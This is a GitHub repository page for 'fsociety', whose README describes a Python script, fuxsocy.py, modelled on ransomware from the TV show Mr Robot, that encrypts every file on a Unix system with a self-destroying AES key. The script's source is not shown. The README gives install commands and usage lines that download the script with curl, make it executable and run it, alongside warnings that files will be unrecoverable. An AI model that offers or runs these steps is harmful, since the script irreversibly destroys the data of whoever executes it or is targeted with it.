Skip to content
This repository has been archived by the owner on Jan 3, 2022. It is now read-only.
/ fsociety Public archive

WARNING: do not actually execute this. You will not be able to recover your files

Notifications You must be signed in to change notification settings

atvfool/fsociety

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

36 Commits
 
 
 
 
 
 
 
 

Repository files navigation

fsociety

WARNING: do not actually execute this. You will not be able to recover the files.

This is intended to encrypt every bit of data in a unix filesystem using 256-bit AES with a self-destructing, randomly generated key.

The fuxsocy.py script is based on Darlene's malware shown in Mr Robot

S2E1:

alt text

Dependencies:

  • Python3
  • pycrypto
sudo apt install python3 python3-pip
pip3 install pycrypto

Usage:

curl https://raw.githubusercontent.com/joekendal/fsociety/master/fuxsocy.py
sudo chmod +x fuxsocy.py
./fuxsocy.py

About

WARNING: do not actually execute this. You will not be able to recover your files

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages